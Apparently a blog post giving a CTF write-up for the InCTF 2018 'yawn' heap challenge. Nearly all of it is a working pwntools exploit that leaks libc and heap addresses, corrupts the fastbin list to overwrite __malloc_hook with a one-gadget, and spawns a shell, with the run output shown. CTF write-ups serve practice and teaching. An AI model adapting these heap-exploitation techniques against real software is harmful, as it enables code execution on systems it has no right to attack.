INCTF 2018 - yawn — pwn3r

Category : pwnable

Summary : heap

Exploit

#!/usr/bin/python

from pwn import *

def cmd_add(name, desc):
   ru('>> ')
   sl('1')
   ru('Enter name: ')
   sl(name)
   ru('Enter desc: ')
   if desc:
      sl(desc)

def cmd_edit(idx, name, size, desc):
   ru('>> ')
   sl('2')
   ru('Enter index: ')
   sl(str(idx))
   ru('Enter name: ')
   ss(name)
   ru('Enter size: ')
   sl(str(size))
   ru('Enter desc: ')
   ss(desc)

def cmd_remove(idx):
   ru('>> ')
   sl('3')
   ru('Enter idx: ')
   sl(str(idx))

def cmd_view(idx):
   ru('>> ')
   sl('4')
   ru('Enter idx: ')
   sl(str(idx))

   note = {}
   ru('Note ID : ')
   note['idx'] = int(rl(False))
   ru('Name : ')
   note['name'] = rl(False)
   ru('Size : ')
   note['size'] = int(rl(False))
   ru('Description : ')
   note['desc'] = rl(False)
   return note

s = process('./yawn')
ru = s.recvuntil
rl = s.recvline
rr = s.recv
sl = s.sendline
ss = s.send

free_got = 0x601F68
note_table = 0x602040


# for libc leak
cmd_add('a' * 0x50+p64(0xffffffffffffffff)+p64(free_got), '')
libc_base = u64(cmd_view(0)['desc'].ljust(8, '\x00')) - 0x844f0
print hex(libc_base)
libc_malloc_hook = libc_base + 0x3c4b10
libc_one_gadget = libc_base + 0xf1147
'''
0xf1147    execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
'''

# for heap leak
cmd_add('b' * 0x50+p64(0xffffffffffffffff)+p64(note_table), '')
heap_base = u64(cmd_view(1)['desc'].ljust(8, '\x00')) - 0x1040
print hex(heap_base)

cmd_add('c' * 0x30, 'C' * 0x59)    # 2 : 0x70 0x70
cmd_add('d' * 0x50 + p64(0xffffffffffffffff)+p64(heap_base + 0x1010+ (0x20+0x70)*2+0x10), '')  # 3 : 0x20 0x70
# pointing note2 -> description

cmd_remove(2)
cmd_remove(3)

cmd_add('NO', '_' * 9)

cmd_add(p64(libc_malloc_hook - 0x23), '_' * 9)
cmd_add('NO', '_' * 9)
cmd_add('NO', '_' * 9)
# reallocate libc_malloc_hook
cmd_add('e' * (0x23-0x10) + p64(libc_one_gadget), '_' * 9)

# trigger
cmd_add('give me the shell', 'paul')

s.interactive()
s.close()

$ python ex.py
[+] Starting local process './yawn': pid 2050
0x7fb84bb3e000
0x178a000
[*] Switching to interactive mode
$ id
uid=1000(pwn3r) gid=1000(pwn3r) groups=1000(pwn3r)

저작자표시 비영리 변경금지 (새창열림)

'CTF > 2018' 카테고리의 다른 글

SECCON CTF 2018 QUAL - secret_message (one shot exploit) (0)	2018.11.25
INCTF 2018 - lost (0)	2018.11.04
SECCON 2018 QUAL - Simple memo (0)	2018.11.02
HITCON CTF 2018 - groot (0)	2018.10.30
Tokyo Western CTF 2018 - BBQ (0)	2018.09.10

'CTF > 2018' 카테고리의 다른 글

티스토리툴바